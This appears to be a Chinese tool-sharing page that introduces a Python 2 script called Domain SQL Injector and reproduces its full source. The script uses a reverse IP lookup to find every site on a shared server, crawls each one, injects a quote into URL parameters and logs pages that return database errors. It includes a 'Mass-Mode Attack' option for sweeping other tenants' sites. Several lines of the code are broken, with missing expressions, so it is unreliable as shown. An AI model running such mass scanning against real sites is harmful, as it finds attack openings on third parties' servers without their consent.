Domain SQL Injector
2022-04-06 23:13:07
Domain SQL Injector是一款SQL注入扫描工具,与以往工具不同的是它是扫描名同一服务器上的所有主机是否存在SQL注入漏洞,并将扫描结果以日志记录的方式保存下来。...
Domain SQL Injector是一款SQL注入扫描工具,与以往工具不同的是它是扫描名同一服务器上的所有主机是否存在SQL注入漏洞,并将扫描结果以日志记录的方式保存下来。
# ./
Script Help
./ -h
./ --verbose 1 --url --crawl 50 --pages 5 --output testfire-SQLi.txt
# ./ --verbose 1 --durl --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt :
#!/usr/local/bin/python2.7 # This was written for a Penetration Test assessment and is for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing only! import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime import DomainReverseIPLookUp # The following three variables get their values from command line args, either take user value or stick with the default ones pagesToCrawl = "" # Number of pages to crawl in a website maxVulInjectableParam = "" # Maximum number of vulnerable pages (parameters) to find output = "" # Output file name - append mode (a) reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for reverseIP lookup - write+ mode (w+) crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result for current crawl only - write+ mode (w+) uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for current scan only - write+ mode (w+) errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors - append mode (a) sitesToScan = "" # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack maxVulSites = "" # Stores maximum number of vulnerable sites to find with Mass-Mode Attack reverseFlag = 0 # Determines whether reverseLookUp file is generated by script or user supplies it maxVulSitesFlag = 0 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack verbose = 0 # Determines what messages to display on screen (0 or 1) sqlPayload = ["1'"] # SQL Payloads, add in more here sqlErrors = [ "Warning", "mysql_fetch_array()", "mysql_fetch_object()", "mysql_num_rows()", "mysql_free_result()", "mysql_real_escape_string()", "mysql_connect()", "mysql_select_db()", "mysql_query()", "You have an error in your SQL syntax", "Unclosed quotation mark after the character string", "Server Error in '/' Application", "Microsoft OLE DB Provider for ODBC Drivers error", "supplied argument is not a valid OCI8-Statement", "microsoft jet database engine" ] # add in more here # Determine platform and clear screen def clear_screen(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': os.system('cls') else: pass # Banner - Set the formatting mororn, it's fucked up atm def banner(): print """ ################################################################## Domain SQLi Finder - (Error Based Tool-v0.1) Greetz to: ( GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | \______/ ################################################################### """ print "\tUsage: python %s [options]" % sys.argv[0] print "\t\t-h help\n" call_exit() def call_exit(): print "\n\tExiting ...........\n" sys.exit(0) # Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source def check_SQLi(uniqueUrls): sqliUrls = [] # This list will contain sorted URLs ready to be appended with sqlPayloads flag = 0 # Variable to check whether desired 'n' number of vulnerable pages have been found for link in uniqueUrls: # This list has all unique URLs but since a single unique URL might have multiple parameters num = link.count("=") # so this loop prepares URLs with one parameter each if num > 0: for x in xrange(num): x = x + 1 url = link.rsplit("=",x)[0]+"=" sqliUrls.append(url) sqliUrls = list(set(sqliUrls)) # By now this list has all injectable parameters ready to append sqlPayload parsed = urlparse.urlparse(link) # Later used to obtain website name now = # Current time of scanning to put in DSQLiResults output file try: fd_output = open(output, 'a') fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file except IOError: print "\n\t[!] Error - could not open|write file %s \n" % output if verbose == 1: print "\n[*] Testing SQLi on following URLs:" for link in sqliUrls: print "\t[-] URL: ", link else: print "\n[*] Testing SQLi on URL's ....." # In the following loop, the counter flag plays role to find 'n' number of vulnerable pages. If limited number of pages # have to be found, the value of flag counter determines whether script has found those number of pages or not. Once matches, # it breaks all loops and come out. Else, if it has not touched the limit but links in sqliUrls have finished, control comes # out of all loops. But if (0) i.e. all pages have to be found, flag plays no considerable role other than incrementing itself. for link in sqliUrls: for pload in sqlPayload: if verbose == 1: print "\n\n\tTesting: %s\n" % (link+pload) try: source = urllib2.urlopen(link+pload).read() # Appending sqlPayload and reading source for errors except urllib2.HTTPError, err: if err.code == 500: if verbose == 1: print "\t\t[!] Error - HTTP Error 500: Internal Server Error" print "\t\t[-] Continuing with next link" continue else: if verbose == 1: print "\t\t[!] Error - HTTP Error xxx" print "\t\t[-] Continuing with next link" continue for errors in sqlErrors: if, source) != None: # If any sql error found in source fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n") print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors) if maxVulInjectableParam != 0: # i.e. if 'n' number of vulnerable parameters have to be found if flag < maxVulInjectableParam: flag = flag + 1 else: break else: # i.e if all vulnerable pages have to be found flag = flag + 1 break else: if verbose == 1: print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors else: pass if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found break if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found break if flag != 0: print "\n\t[-] Target is vulnerable to SQLi, check log file" print "\t\t[-] %d injectable vulnerable parameters found" % (flag) global maxVulSitesFlag maxVulSitesFlag = maxVulSitesFlag + 1 # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack else: print "\n\t[-] Target is not vulnerable to SQLi" try: fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n") fd_output.close() # Close the file on completion of each URL, so that log file could be seen for except IOError: # result instantly, instead of waiting for whole script to finish print "\n\t[!] Error - file I/O error\n" try: fd_output.close() except IOError: pass # Just finds the unique URLs from all crawled URLs and saves to list # Concept is: Parse the URL, find its injectable parameter(s), check the combination of [netlock, path and injectable parameters] with earlier found # combinations, if unique, update our uniqueUrls list else goto next URL and parse it for same procedure def unique_urls(unsortedUrls): print "\n[*] Finding unique URL's ....." list_db = [] # Used as temporary storage to compare parameters with already found ones uniqueUrls = [] # This one will finally have unique URLs in it for link in unsortedUrls: list_tmp = [] # Temporary list to store query parameters only try: parsed = urlparse.urlparse(link) num = parsed.query.count("=") # Just checking the parsed.query portion for number of injectable parameters it has x = 0 for x in xrange(num): list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0]) # list_tmp would have all injectable parameters in it as elements x = x + 1 except IndexError: # In my case links generate error bcoz they include an external URl and increase the number of "=" in link. # accordingly the loop run 1 extra time and generates out of index error if verbose == 1: print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump) try: fd_errorDump = open(errorDump, 'a') fd_errorDump.write("\n\t[*] Error occured inside unique_urls function for:\t" + parsed.query) except IOError: print "\n\t[!] Error - could not open|write file %s \n" % errorDump continue list_tmp = [parsed.netloc, parsed.path, list_tmp] if list_tmp in list_db: # For the first URL, this condition would definitely fail as list_db is empty continue # i.e. same parameters but with different values have been found, so continue else: list_db.append(list_tmp) # Update the found unique parameters uniqueUrls.append(link) # Update the List with unique complete URLs if verbose == 1: for link in uniqueUrls: print "\t[-] Unique link found: ", link try: fd_uniqueLinkDump = open(uniqueLinksDump, 'a') for link in uniqueUrls: fd_uniqueLinkDump.write(link + '\n') fd_uniqueLinkDump.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump check_SQLi(uniqueUrls) # Call SQLi check function to test SQLi vulnerability # Function crawls to find "linksToCrawl" number of pages from URL. # It stops when limit reaches or no more pages left to crawl, which ever meets the condition first def crawl_site(url): print "[*] Attacking URL -> ", url print "\t[*] Crawling %s to find injectable parameters" % url spider = chilkat.CkSpider() # Using Chilkat Library. Some modules are free. spider.Initialize(url) spider.AddUnspidered(url) spider.CrawlNext() print "\n\t[-] Website Title: ", spider.lastHtmlTitle() print "\n\t[-] Crawling Pages", # The trailing comma to show progress bar in case of non-verbose crawlerOutput = [] # This list would have all the linksToCrawl number of pages of URL for i in range(0,int(pagesToCrawl)): success = spider.CrawlNext() if (success == True): if verbose == 1: if i%50 == 0: print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl) print "\t", spider.lastUrl() else: sys.stdout.flush() print ".", # In non verbose case, it prints dot dot dot to show the progress crawlerOutput.append(spider.lastUrl()) else: if (spider.get_NumUnspidered() == 0): print "\n\t[-] No more URLs to spider" i = i - 1 # Need to decrement, else gives +1 count for total pages crawled break else: print spider.lastErrorText() continue spider.SleepMs(10) try: fd_crawlDump = open(crawlDump, 'a') # Logs for link in crawlerOutput: fd_crawlDump.write(link + '\n') fd_crawlDump.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % crawlDump print "\n\t[-] Crawled %d pages successfully" % (i+1) if verbose == 1: print "\n[*] Parsing URL's to collect links with '=' in them ....." urlsWithParameters = [] # This list would have only those URLs which has '=' in them i.e. injectable parameter(s) for link in crawlerOutput: if link.count("=") > 0: urlsWithParameters.append(link) if urlsWithParameters != []: if verbose == 1: print "\t[-] Done" unique_urls(urlsWithParameters) # Time to find unique URLs among all with '=' in them else: print "\n\t[!] No injectable parameter found" now = # Current time to put in DSQLiResults output file try: parsed = urlparse.urlparse(url) fd_output = open(output, 'a') fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file fd_output.write("\t\tNo injectable parameter found\n") fd_output.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % output # Function tries to find SQLi on sites on shared hosting def attack_Domain(durl): sites = [] counter = 0 # This keeps check on how many sites have been scanned so far deadLinks = 0 # This keeps check on how many dead links have been found print "\n[*] Attacking Domain -> ", durl if reverseFlag == 0: # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose) # pass domain url, output file name and verbose level try: fd_reverseLookUp = open(reverseLookUp, 'r') for url in fd_reverseLookUp.readlines(): sites.append(url) # List sites contains all the domains hosted on server except IOError: print "\n\t[!] Error - %s file missing" % reverseLookUp print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website" call_exit() elif reverseFlag == 1: # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file try: fd_reverseLookUp = open(reverseLookUp, 'r') for url in fd_reverseLookUp.readlines(): sites.append(url) # List sites contains all the domains hosted on server except IOError: print "\n\t[!] Error - %s file missing" % reverseLookUp print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website" call_exit() if len(sites)%10 != 0: sites = sites[0:(len(sites)%10)] else: sites = sites[0:((len(sites)+2)%10)] for site in sites: try: print "\n\t#################################################" print "\n\t [-] Number of alive sites scanned so far: ", counter print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag print "\n\t [-] Number of dead sites found so far: ", deadLinks print "\n\t#################################################\n" if maxVulSites != 0: # i.e. if not all vulnerable sites are to be found if maxVulSitesFlag == maxVulSites: print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found" break if site[:7] != "https://": # prepend https:// to url, if not already done by user site = "https://" + site # what about https site? site = site[:-1] # remove \n at the end of each element print "-"*80 print "\n[*] Target URL - %s ....." % (site) # Verify URL for its existance if verify_URL(site) == True: # Function call to verify URL for existance print "\t[-] URL Verified\n" crawl_site(site) # Pass the site to crawl function else: print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site deadLinks = deadLinks + 1 continue except KeyboardInterrupt: decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ") if decision == 'C' or decision == 'c': continue elif decision == 'q': print "\n[!] Error - user aborted" call_exit() else: print "\n\tEnjoy: oo=========> (|)" call_exit() counter = counter + 1 # Counting for only those sites which really got scanned # for those whose URLs couldn't be verified, not incrementing counter print "\n\n[*] Scanning Finished" print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag print "\t[-] Check log file %s for result" % output # Function to verify URL is alive and accessible def verify_URL(url): good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY] # 200, 302, 301 respectively host, path = urlparse.urlparse(url)[1:3] # elems [1] and [2] - netloc and path try: conn = httplib.HTTPConnection(host) conn.request('HEAD', path) status = conn.getresponse().status conn.close() except StandardError: status = None return status in good_codes # Either 'True' or 'False' # Parse command line arguments, allowed combinations and mandatory values def parseArgs(): parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to |") parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int) parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)') group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain') group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi') group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int) group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int) # Mind it - In group1 and group2, same paramters "crawl" and "pages" are used. So on console whether uses --crawl or --dcrawl, # they would update the same variable "crawl" and ultimately the global variable pagesToCrawl. Same goes for "pages" group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain') group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi') group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)') group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)') group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)') group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)') group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file') args = parser.parse_args() # Check exclusiveness of options if (args.URL != None and args.DURL != None): print "\n\t[!] Error - Mutually exclusive options (--url, --durl)" call_exit() # Check existance of at least one option if (args.URL == None and args.DURL == None): print "\n\t[!] Error - No mode selected (--url, --durl)" call_exit() # Check if value is passed to args. e.g. --crawl without value would pass "None" to it and program would crash # all of these switches have default value, so user either don't mention them on command prompt or must put a value for them if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None): print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)" call_exit() # Check to make sure numeral value of vulsites is less than sites and pages < crawl if args.sites < args.vulsites: print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n" call_exit() elif args.crawl < args.pages: print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n" call_exit() # Check if switch --reverse is used with --durl only if ((args.URL != None) and (args.reverseLookUp != None)): print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only" call_exit() global reverseLookUp # Declaring it here as it's been used couple of times in this fuction # Check verbosity (--verbose argument) if args.verbose != None: # It would be none only when mentioned without any value i.e. --verbose <no value> if args.verbose == 1: # and if that is the case, the global value of verbose is 0 already, so - verbose off print "\n[*] Verbose Mode On" global verbose # verbose global variable verbose = 1 if args.URL != None: # Verbose mode for --url print "\t[-] Pages to crawl (default=500): ", (args.crawl) print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages) print "\t[-] Output file name: %s" % (args.siteOutput) if args.DURL != None: # Verbose mode for --durl print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites) print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites) print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl) print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages) if args.reverseLookUp != None: # i.e. if on console the reverse.txt file names is mentioned print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0]) else: print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp print "\t[-] Final result output file: %s" % (args.siteOutput) else: # i.e. if value 0 is passed to --verbose print "\n[*] Verbose Mode Off" else: # i.e. verbose has None Value, it's been passed without value print "\n[*] Vebose Mode Off (by default)" # By this point, either of --url, --durl or --aurl switch is enable # Following assignments are for --url, --durl - see if you wish to put only relevant one and take rest in if args.DURL != None # It's OK with current "common" crawl and pages parameters. If I assign parameter separately for --url and --durl then first I # would need to define "dcrawl" and "dpages" and use them in combination with --durl global pagesToCrawl pagesToCrawl = args.crawl global maxVulInjectableParam maxVulInjectableParam = args.pages global output output = args.siteOutput global sitesToScan sitesToScan = args.sites global maxVulSites maxVulSites = args.vulsites # Single-Mode Attack (--url argument) if args.URL != None: if args.URL[0][:7] != "https://": # prepend https:// to url, if not already done by user args.URL[0] = "https://"+args.URL[0] # what about https site? print "\n[*] Verifying URL....." # Verify URL for its existance if verify_URL(args.URL[0]) == True: # Function call to verify URL for existance print "\t[-] URL Verified\n" crawl_site(args.URL[0]) # Goto the function which deals with 1 URL else: print "\n\t[-] URL cound not be verified." call_exit() # Mass-Mode Attack (--durl argument) elif args.DURL != None: if args.DURL[0][:7] != "https://": args.DURL[0] = "https://"+args.DURL[0] # reverseLookUp doesn't have default value, so if not mentioned on console, it will be None. If not None, that means user wants to read reverse look-up # which is already generated file, either using this code or copied from somewhere. In that case, i/p file must reside in same directory if args.reverseLookUp != None: reverseLookUp = args.reverseLookUp[0] global reverseFlag # Determines whether reverseLookUp file is generated by script or user supplies it reverseFlag = 1 attack_Domain(args.DURL[0]) else: # i.e. --reverse is not mentioned on command prompt. Our code shall generate one. print "\n[*] Verifying Domain - %s ....." % (args.DURL[0]) if verify_URL(args.DURL[0]) == True: print "\t[-] Domain Verified\n" attack_Domain(args.DURL[0]) else: print "\n\t[-] Domain cound not be verified." call_exit() def main(): #clear_screen() if len(sys.argv) < 2: banner() parseArgs() # Parse command line arguments call_exit() # ---------------------------------------- Code execution starts here ------------------------------------- if __name__ == '__main__': try: main() except KeyboardInterrupt: print "\n[!] Error - user aborted" call_exit()
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